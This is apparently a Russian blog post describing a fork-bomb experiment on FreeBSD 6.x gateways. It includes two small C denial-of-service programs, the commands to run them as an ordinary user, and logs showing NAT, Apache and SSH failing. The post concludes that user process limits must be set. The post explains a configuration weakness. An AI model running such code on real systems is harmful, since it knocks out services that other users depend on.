Bomb on FreeBSD :)
Решил поиграться с процессами на фре. Не для кого не секрет что существуют эксплоиты вызывающие отказ в обслуживании, ежедневно находятся баги, фиксятся и.т.д и.т.п. Только вот по большому счету этого ничего не даст если не ограничивать процессы пользователей. На плохо настроенной системе - элементарный fork может грохнуть всё и вся запущенный под обычным пользователем со стандартной группой. Чудеса в решете :) Очень повезёт если админ
сможет перезагрузить машину каким-то образом, а если не сможет? Итак практика.
Берем стандартно настроенные шлюз на FreeBSD 6.1/6.2, на шлюзе natd, апач и прочие радости, создаем пользователя joe с обычными правами.
[joe@br0 ~]$ id
uid=1003(joe) gid=1003(joe) groups=1003(joe)
[joe@br0 ~]$ ls
bomb.c
[joe@br0 ~]$ cat bomb.c
main(int argc, char **argv[]) {
while(1) {
execl("/bin/ls","ls",argv[0],1);
}
}
Пускаем и смотрим top, если получится (у меня на Селероне 1400 даже с таким раскладом не удавалось залезть в ssh) один раз все-таки залез, вот результат:
br0# top
fork: Resource temporarily unavailable
br0# killall bomb
fork: Resource temporarily unavailable
Висим.. На Turion X2 (FreeBSD 6.2) с гигом оперативки можно даже работать, куллер конечно начинает орать как сумашедший, в топе загрузка 98% но работать можно.
Фантазируем дальше:
[joe@br0 ~]$ cat bomb.c
main(int argc, char **argv[]) {
while(1) {
execl("/usr/sbin/inetd","inetd",argv[0],1);
fork();
}
}
Пускаем чудо...
[joe@br0 ~]$ gcc bomb.c -o bomb
[joe@br0 ~]$ ./bomb
Все...Пол минуты и система мертва, на шлюзе freebsd 6.1 через минуту перестает работать нат, апач и все остальное, попытки соединения по ssh вылетают с таймаутом..Смотрим логи и делаем выводы:
Apr 23 20:18:42 br0 kernel: maxproc limit exceeded by uid 1003, please see tuning(7) and login.conf(5).
Apr 23 20:19:30 br0 last message repeated 3 times
Apr 23 20:20:34 br0 last message repeated 14 times
Пытаемся зарутится:
[bro@br0 /home/joe]$ su
Cannot fork: Resource temporarily unavailable
Пытаемся убить это зло из под рута на ttyv0
br0# killall bomb
Cannot fork: Resource temporarily unavailable
На турионе все тоже самое, только потребовалось чуть больше минуты чтобы система перестала реагировать на что-либо, пытался залогинится с первой консоли:
FreeBSD/i386 (dangerb0x) (ttyv1)
login: root
Код то сам пустяковый, а теперь прикиньте что можно нафантазировать? - результат будет один.
Всё - тишина...Через минут 5 залогиннится удалось - но в csh так и не попал, может надо было часок подождать? :) а если бы и попал то потребовалось бы много времени чтобы найти зловредный процесс и убить его..А если доступ есть только по ssh ?:)
От сюда вывод, как бы мы не заботились о безопасности, фиксили, патчили, забыв про такую простую вещь как процессы обычных пользователей можно повиснуть далеко и на долго и просто напросто даже ни иметь доступа исправить это положение :)
Последние новости
Бхастрика
Техника бхастрики имеет много общего с капалабхати, но существуют и значительные различия между этими упражнениями. Йоги часто расценивают капалабхати как облегченную разновидность бхастрики, что позволяет использовать последнюю для освоения более сложного этапа очистительной дыхательной гимнастики. Для выполнения бхастрики наибо...Читать далее »
Дхарана и дхьяна, или концентрация и медитация
Дхарана и дхьяна – шестая и седьмая ступени системы Патанджали. Наряду с пратьяхарой и самадхи они составляют раджа-йогу. Чем отличается концентрация от медитации? При концентрации включается только разум; при медитации – сердце и все существо в целом. При концентрации разум фиксируется на каком-то определенном предмете. Меди...Читать далее »
Йога пальцев
В руках расположены удивительные энергетические каналы, связанные с целой функциональной системой и носящие название органа, на который они замыкаются. Положение рук – мудра, строго определено каноном и имеет тайный символический смысл. Знатоки мудры насчитывают сотни различных значений в комбинациях и фигурах, изображаемых пальцами. Йо...Читать далее »
Массаж глаз
Его выполняют, когда чувствуют, что глаза устали во время какой-либо работы (чтение, шитье). Это упражнение может входить в комплекс, но может быть и самостоятельным. 1. Через ноздри делают спокойный и полный вдох. Приближают ладони к глазам так, чтобы получился угол, равный 45°. 2. Через нос делают выдох. В этот момент начинают мас...Читать далее »
Заключение
Секрет йоги заключается в том, что она взаимодействует с человеком в целом, а не с какой-то одной сферой его физиологической и духовной жизни. Она сопряжена с физическим, умственным, нравственным и духовным развитием индивида. Она укрепляет силы, уже существующие внутри нас. Начиная с улучшения здоровья, благоприобретенного отличного физического состояния, она шаг за шагом охватывает ментальну...Читать далее »
Наули
Данное упражнение йоги называют устранением прямых мышц живота. Действие наули не имеет ничего общего с уддияной бандхой, хотя отдельные элементы выполнения обоих упражнений совпадают. Исходное положение для наули то же самое, что и для уддияны бандхи. Сначала нужно вдохнуть максимально полно, а затем выполнить уддияну баядху. После этого прямые мышцы живота напрягаются, а живот выпячиваетс...Читать далее »
Процедура полоскания горла
Необходимо также заботиться о здоровье горла. Миндалины, расположенные в горле, – часть иммунной системы. Они представляют собой барьер, защищающий организм от болезнетворных микробов, проникающих извне. Процедуры вамана-дхаоти и джаля-нети весьма благотворно влияют на состояние горла. Для борьбы с заболеваниями горла есть комплекс упражнений. Гигиеническое полоскание горла солонова...Читать далее »
